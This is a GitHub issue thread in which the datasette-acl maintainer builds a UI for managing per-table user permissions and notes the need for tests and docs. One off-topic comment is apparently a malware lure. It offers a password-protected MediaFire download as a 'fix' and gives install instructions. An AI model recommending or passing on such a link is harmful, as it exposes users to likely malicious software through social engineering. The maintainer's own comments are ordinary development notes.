### ISSUE TITLE
Manage user permissions for the table

### ISSUE THREAD

**Issue by simonw** [datasette/datasette-acl#9]
No we have user permissions from:
- #8

I'm going to add the ability to set them on the table page.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by simonw** [comment]
Initial attempt at a UI - doesn't quite work yet:

![CleanShot 2024-08-30 at 23 10 10@2x](https://github.com/user-attachments/assets/c49e4018-4f96-45df-9550-a429c308a5b9)

**Comment by simonw** [comment]
Got it working:

![users](https://github.com/user-attachments/assets/1650a250-4df6-46a3-b815-1c987dfd5eaa)

**Comment by simonw** [comment]
Needs tests and docs.

**Comment by simonw** [comment]
Wrote a TIL about the test pattern I am using: https://til.simonwillison.net/pytest/namedtuple-parameterized-tests
